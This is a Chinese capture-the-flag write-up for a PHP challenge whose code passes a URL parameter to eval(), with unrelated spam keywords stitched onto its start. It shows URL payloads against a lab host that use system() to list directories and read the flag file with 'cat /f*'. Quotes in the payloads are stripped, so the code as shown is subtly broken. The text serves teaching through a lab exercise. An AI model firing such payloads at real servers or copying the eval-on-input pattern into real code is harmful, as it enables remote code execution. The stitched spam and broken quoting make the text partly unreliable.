派多格宠物网站建设,土巴兔装修,龙岗区建设工程交易服务中心,wordpress 热门搜索先看网页 代码审计#xff1a;
error_reporting(0); #xff1a;关闭报错#xff0c;代码的错误将不会显示
highlight_file(__FILE__); #xff1a;将当前文件的源代码显示出来
eval($_GET[url]); #xff1a;将url的值作为php代码执行
解题#xff1a;
题目既然允许…先看网页 代码审计
error_reporting(0); 关闭报错代码的错误将不会显示
highlight_file(__FILE__); 将当前文件的源代码显示出来
eval($_GET[url]); 将url的值作为php代码执行
解题
题目既然允许我们自己输入代码那我们就先ls查看文件
http://node5.anna.nssctf.cn:28422/?urlsystem(ls);
注意因为eval函数是把url的值当成php代码所以记得遵守php代码的书写规范在最后加个分号 可以看到只有一个index.php那我们尝试往它的父目录找flag
http://node5.anna.nssctf.cn:28422/?urlsystem(cd ../;ls); 没有flag再往上
http://node5.anna.nssctf.cn:28422/?urlsystem(cd ../../;ls); 没有再往上
http://node5.anna.nssctf.cn:28422/?urlsystem(cd ../../../;ls); 有了我们直接打开flag
http://node5.anna.nssctf.cn:28422/?urlsystem(cd ../../../;ls;cat flllllaaaaaaggggggg); 这样就得到flag了。
其实这道题快的话可以运用如下payload
http://node5.anna.nssctf.cn:28422/?urlsystem(ls /);
其中system(ls /);是列出根目录的文件这道题的flag正好在根目录上
http://node5.anna.nssctf.cn:28422/?urlsystem(cat /f*);
其中system(cat /f*);是查看文件系统中以f开头的文件
